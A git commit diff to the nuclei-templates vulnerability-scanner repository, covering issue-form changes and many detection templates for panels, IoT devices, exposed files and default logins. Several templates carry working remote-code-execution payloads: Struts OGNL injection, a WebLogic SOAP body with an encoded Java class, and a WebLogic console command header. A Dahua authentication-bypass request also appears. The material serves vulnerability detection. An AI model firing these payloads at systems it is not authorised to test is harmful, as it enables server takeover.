Noam Rathaus 2021-10-21 08:32:04 +03:00
commit fde188d253
113 changed files with 697 additions and 146 deletions

View File

@ -1,32 +0,0 @@
---
name: Bug report
about: Create a issue to help us improve
title: "[Bug] "
labels: ''
assignees: ''
---
**Nuclei version**
```
nuclei -version
```
**Nuclei template version**
```
cat ~/.nuclei-config.json
```
**Describe the bug**
A clear and concise description of what the bug is.
**Commands to reproduce**
```
nuclei -t xxx -target xxx
```
**Screenshots**
If applicable, add screenshots to help explain your problem.

14
.github/ISSUE_TEMPLATE/config.yml vendored Normal file
View File

@ -0,0 +1,14 @@
blank_issues_enabled: false
contact_links:
- name: Ask an question / advise on using nuclei-templates
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/q-a
about: Ask a question or request support for using nuclei-templates
- name: Share idea / feature to discuss for nuclei-templates
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
about: Share idea / feature to discuss for nuclei-templates
- name: Connect with PD Team & Community (Discord)
url: https://discord.gg/projectdiscovery
about: Connect with PD Team & Community for direct communication

View File

@ -1,30 +1,24 @@
---
name: False Positive
about: 'Create an issue if you found false positive results. '
title: "[false-positive] template-name "
about: 'Issue for template producing false positive results.'
labels: 'false-positive'
assignees: ''
---
**Nuclei version**
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
```
nuclei -version
```
### Nuclei Version:
**Nuclei template version**
<!-- You can find current version of nuclei with "nuclei -version" -->
```
cat ~/.nuclei-config.json
```
### Template file:
**Template ID**
<!-- Template producing false-positive results, for example: "cves/XX/XX.yaml" -->
Please submit the ID template producing false-positive results.
### Command to reproduce:
**Commands to Reproduce**
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->
```
nuclei -t template_id -target ?
```
### Anything else:
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->

View File

@ -1,16 +1,18 @@
---
name: Feature request
about: Suggest an idea to improve nuclei templates
title: "[Feature] "
labels: ''
assignees: ''
about: Request feature to implement in this project
labels: 'Type: Enhancement'
---
**Is your feature request related to a problem? Please describe.**
<!--
1. Please make sure to provide a detailed description with all the relevant information that might be required to start working on this feature.
2. In case you are not sure about your request or whether the particular feature is already supported or not, please start a discussion instead.
3. GitHub Discussion: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
4. Join our discord server at https://discord.gg/projectdiscovery to discuss the idea on the #nuclei-templates channel.
-->
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
### Please describe your feature request:
<!-- A clear and concise description of feature to implement -->
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
### Describe the use case of this feature:
<!-- A clear and concise description of the feature request's motivation and the use-cases in which it could be useful. -->

21
.github/ISSUE_TEMPLATE/issue-report.md vendored Normal file
View File

@ -0,0 +1,21 @@
---
name: Issue report
about: "Issue to report invalid template"
labels: 'Type: Bug'
---
<!--
1. Please search to see if an issue already exists for the bug you encountered.
2. For support requests, FAQs or "How to" questions, please use the GitHub Discussions section instead - https://github.com/projectdiscovery/nuclei-templates/discussions or
3. Join our discord server at https://discord.gg/projectdiscovery and post the question on the #nuclei-templates channel.
-->
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
### Issue description:
<!-- A concise description of what you're experiencing. -->
### Anything else:
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->

View File

@ -1,15 +1,23 @@
---
name: Submit Template
about: Submit nuclei template using issue
title: "[nuclei-template] template-name"
name: Template Contribution
about: Contributing nuclei template using GitHub Issue
labels: 'nuclei-template'
assignees: ''
---
**Template Details**
### Template Information:
<!-- Include basic information of the template including reference -->
<!-- Templates without any reference mostly likely to take more time for review/validation -->
### Nuclei Template:
<!-- Include nuclei template in between code block shared below -->
```yaml
nuclei template goes here
```
<!-- Include template results if available or redacted valid response snippet of valid match -->
<!-- Example response help us to update the matchers as unique as possible to avoid possible false-positive results. -->

View File

@ -14,8 +14,3 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
files:
- "token-spray/"

View File

@ -11,25 +11,19 @@ info:
requests:
- raw:
- |
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
- |
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
- |
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept: */*
Accept-Language: en
payloads:
params:
@ -40,11 +34,12 @@ requests:
matchers-condition: and
matchers:
- type: status
condition: or
status:
- 200
- 400
condition: or
- type: regex
part: body
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
part: body

View File

@ -91,15 +91,16 @@ requests:
- webviewer
- welcome
attack: sniper
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
condition: and
words:
- "environment variable"
- "display library search paths"
condition: and

View File

@ -22,14 +22,16 @@ requests:
payloads:
ids: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Dashboard</title>"

View File

@ -0,0 +1,32 @@
id: CVE-2019-2729
info:
name: Oracle WebLogic Server Administration Console Handle RCE
author: igibanez
severity: critical
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-2729
tags: cve,cve2019,oracle,rce,weblogic
requests:
- raw:
- |
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="sun.misc.BASE64Decoder"><void method="decodeBuffer" id="byte_arr"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class="org.mozilla.classfile.DefiningClassLoader"><void method="defineClass"><string>ResultBaseExec</string><object idref="byte_arr"></object><void method="newInstance"><void method="do_exec" id="result"><string>echo${IFS}9272-9102-EVC|rev</string></void></void></void></void><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"></object><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="writeStream"><object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object></void><void method="flush"/></void><void method="getWriter"><void method="write"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "CVE-2019-2729"
- type: status
status:
- 200

View File

@ -28,8 +28,7 @@ requests:
- |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}}
cmd: §exec§
Connection: close
cmd: {{exec}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@ -41,12 +40,12 @@ requests:
matchers-condition: and
matchers:
- type: regex
condition: or
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
part: body
- type: status
status:

View File

@ -31,11 +31,12 @@ requests:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
attack: sniper
matchers-condition: and
matchers:
- type: regex
condition: or
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"

View File

@ -22,6 +22,8 @@ requests:
path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
skip-variables-check: true
matchers-condition: and
matchers:
- type: status

View File

@ -0,0 +1,37 @@
id: CVE-2021-20031
info:
name: Sonicwall SonicOS 7.0 - Host Header Injection
author: gy741
severity: medium
description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
reference:
- https://www.exploit-db.com/exploits/50414
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
metadata:
google-dork: inurl:"auth.html" intitle:"SonicWall"
tags: cve,cve2021,sonicwall,redirect
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-20031
cwe-id: CWE-601
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{randstr}}.tld
matchers-condition: and
matchers:
- type: word
words:
- 'https://{{randstr}}.tld/auth.html'
- 'Please be patient as you are being re-directed'
part: body
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,54 @@
id: CVE-2021-33044
info:
name: Dahua IPC/VTH/VTO devices Authentication Bypass
author: gy741
severity: critical
description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
reference:
- https://github.com/dorkerdevil/CVE-2021-33044
- https://nvd.nist.gov/vuln/detail/CVE-2021-33044
- https://seclists.org/fulldisclosure/2021/Oct/13
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-33044
cwe-id: CWE-287
tags: dahua,cve,cve2021,auth-bypass
requests:
- raw:
- |
POST /RPC2_Login HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
Connection: close
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://{{Hostname}}/
Referer: http://{{Hostname}}/
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "true"
- "id"
- "params"
- "session"
condition: and
extractors:
- type: regex
group: 1
part: body
regex:
- ',"result":true,"session":"([a-z]+)"\}'

View File

@ -1,4 +1,5 @@
id: grafana-default-login
info:
name: Grafana Default Login
author: pdteam
@ -26,7 +27,6 @@ requests:
username:
- admin
- admin
password:
- prom-operator
- admin
@ -35,15 +35,13 @@ requests:
matchers:
- type: word
words:
- grafana_session
- "grafana_session" # Login cookie
part: header
# Check for 'grafana_session' cookie on valid login in the response header.
- type: word
words:
- Logged in
part: body
# Check for valid string on valid login.
words:
- "Logged in" # Logged in keyword
- type: status
status:

View File

@ -20,15 +20,13 @@ requests:
username:
- admin
attack: sniper
matchers-condition: and
matchers:
- type: word
condition: and
words:
- '"redirect": "/htdocs/pages/main/main.lsp"'
- '"error": ""'
condition: and
- type: status
status:

View File

@ -18,22 +18,21 @@ requests:
payloads:
password:
- 12345
attack: sniper
- "12345"
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "session_id="
- "resource"
condition: and
- type: word
words:
- "Invalid Password"
part: body
negative: true
words:
- "Invalid Password"
- type: status
status:

View File

@ -0,0 +1,23 @@
id: alienVault-usm
info:
name: AlienVault USM
author: dhiyaneshDK
severity: info
tags: panel
metadata:
shodan: 'http.title:"AlienVault USM"'
requests:
- method: GET
path:
- '{{BaseURL}}/ossim/session/login.php'
matchers-condition: and
matchers:
- type: word
words:
- '<title>AlienVault USM'
- type: status
status:
- 200

View File

@ -0,0 +1,23 @@
id: exsi-system
info:
name: ESXi System
author: dhiyaneshDK
severity: info
tags: panel
metadata:
shodan: 'html:"esxUiApp"'
requests:
- method: GET
path:
- '{{BaseURL}}/ui/#/login'
matchers-condition: and
matchers:
- type: word
words:
- 'ng-app="esxUiApp"'
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: samsung-printer-detect
info:
name: SAMSUNG Printer Detection
author: pussycat0x
severity: info
tags: iot,panel
metadata:
fofa-dork: 'app="SAMSUNG-Printer"'
requests:
- method: GET
path:
- "{{BaseURL}}/sws/index.html"
matchers-condition: and
matchers:
- type: word
words:
- '<title> SyncThru Web Service </title>'
- type: status
status:
- 200

View File

@ -0,0 +1,23 @@
id: sql-monitor
info:
name: SQL Monitor
author: dhiyaneshDK
severity: info
tags: panel
metadata:
shodan: 'html:"SQL Monitor"'
requests:
- method: GET
path:
- '{{BaseURL}}/Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True'
matchers-condition: and
matchers:
- type: word
words:
- '<p>JavaScript needs to be enabled for SQL Monitor to work properly.</p>'
- type: status
status:
- 200

View File

@ -36,6 +36,7 @@ requests:
- "{{BaseURL}}/.github/workflows/ci-daily.yml"
- "{{BaseURL}}/.github/workflows/ci-issues.yml"
- "{{BaseURL}}/.github/workflows/smoosh-status.yml"
- "{{BaseURL}}/.github/workflows/snyk.yml"
matchers-condition: and
matchers:

View File

@ -0,0 +1,29 @@
id: gruntfile-exposure
info:
name: Gruntfile Exposure
author: sbani
severity: info
reference: https://gruntjs.com/sample-gruntfile
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/Gruntfile.js"
- "{{BaseURL}}/Gruntfile.coffee"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
condition: and
words:
- "module.exports"
- "grunt"
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: jetbrains-datasource
info:
name: Jetbrains IDE DataSources exposure
author: FlorianMaak
severity: info
description: Contains uuid of datasource to retrieve via .idea/dataSources/{uuid}.xml to expose database structure.
tags: config,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.idea/dataSources.xml"
matchers-condition: and
matchers:
- type: word
words:
- "DataSourceManagerImpl"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: prometheus-config-endpoint
info:
name: Prometheus config API endpoint
author: geeknik
severity: info
description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder <secret> (although this still leaks the username).
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
tags: prometheus,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/status/config"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'job_name:'
- '{"status":"success","data":'
- 'targets:'
condition: and
- type: word
part: header
words:
- 'application/json'

View File

@ -0,0 +1,37 @@
id: prometheus-flags-endpoint
info:
name: Prometheus flags API endpoint
author: geeknik
severity: info
description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username.
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
tags: prometheus,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/status/flags"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"data":'
- '"config.file":'
condition: and
- type: word
part: header
words:
- 'application/json'
extractors:
- type: regex
name: web_admin_enabled
regex:
- '\"web\.enable\-admin\-api\"\: \"true\"'

View File

@ -0,0 +1,31 @@
id: prometheus-targets-endpoint
info:
name: Prometheus targets API endpoint
author: geeknik
severity: info
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developers knowledge.
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
tags: prometheus,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/targets"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '{"status":"success","data":'
- 'Labels'
condition: and
- type: word
part: header
words:
- 'application/json'

View File

@ -15,6 +15,7 @@ requests:
- "{{BaseURL}}/server/storage/"
- "{{BaseURL}}/intikal/storage/"
- "{{BaseURL}}/elocker_old/storage/"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

View File

@ -23,17 +23,17 @@ requests:
payloads:
path: helpers/wordlists/adminer-paths.txt
attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "- Adminer</title>"
- "partial(verifyVersion, "
condition: and
- "partial(verifyVersion"
- type: status
status:
- 200

View File

@ -14,12 +14,10 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept-Language: en-US,en;q=0.9
Connection: close
payloads:
mdbPaths: helpers/wordlists/mdb-paths.txt
attack: sniper
threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true

View File

@ -1,4 +1,5 @@
id: prestashop-module-fuzz
info:
name: Prestashop Modules Enumeration
author: meme-lord
@ -16,19 +17,18 @@ requests:
payloads:
path: helpers/wordlists/prestashop-modules.txt
attack: sniper
threads: 50
threads: 50
matchers-condition: and
matchers:
- type: word
condition: and
words:
- "<module>"
- "<name>"
- "<displayName>"
- "<is_configurable>"
- "</module>"
condition: and
- type: status
status:

View File

@ -1,4 +1,5 @@
id: wordpress-plugins-detect
info:
name: WordPress Plugins Detection
author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads:
pluginSlug: helpers/wordlists/wordpress-plugins.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and
matchers:
- type: status

View File

@ -1,4 +1,5 @@
id: wordpress-themes-detect
info:
name: WordPress Theme Detection
author: 0xcrypto
@ -13,11 +14,8 @@ requests:
payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt
attack: sniper
threads: 50
redirects: true
max-redirects: 1
threads: 50
matchers-condition: and
matchers:
- type: status

24
iot/codian-mcu-login.yaml Normal file
View File

@ -0,0 +1,24 @@
id: codian-mcu-login
info:
name: Codian MCU Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7404
tags: iot
metadata:
shodan: 'http.title:"Codian MCU - Home page"'
requests:
- method: GET
path:
- '{{BaseURL}}/login.html'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Codian MCU - login:</title>'
- type: status
status:
- 200

24
iot/envision-gateway.yaml Normal file
View File

@ -0,0 +1,24 @@
id: envision-gateway
info:
name: EnvisionGateway
author: dhiyaneshDK
severity: low
reference: https://www.exploit-db.com/ghdb/7315
tags: iot
metadata:
shodan: 'http.title:"EnvisionGateway"'
requests:
- method: GET
path:
- '{{BaseURL}}/#'
matchers-condition: and
matchers:
- type: word
words:
- '<title>EnvisionGateway</title>'
- type: status
status:
- 200

View File

@ -0,0 +1,24 @@
id: heatmiser-wifi-thermostat
info:
name: Heatmiser Wifi Thermostat
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7445
tags: iot
metadata:
shodan: 'http.title:"Heatmiser Wifi Thermostat"'
requests:
- method: GET
path:
- '{{BaseURL}}/index.htm'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Heatmiser Wifi Thermostat</title>'
- type: status
status:
- 200

24
iot/webcamxp-5.yaml Normal file
View File

@ -0,0 +1,24 @@
id: webcamxp-5
info:
name: webcamXP 5
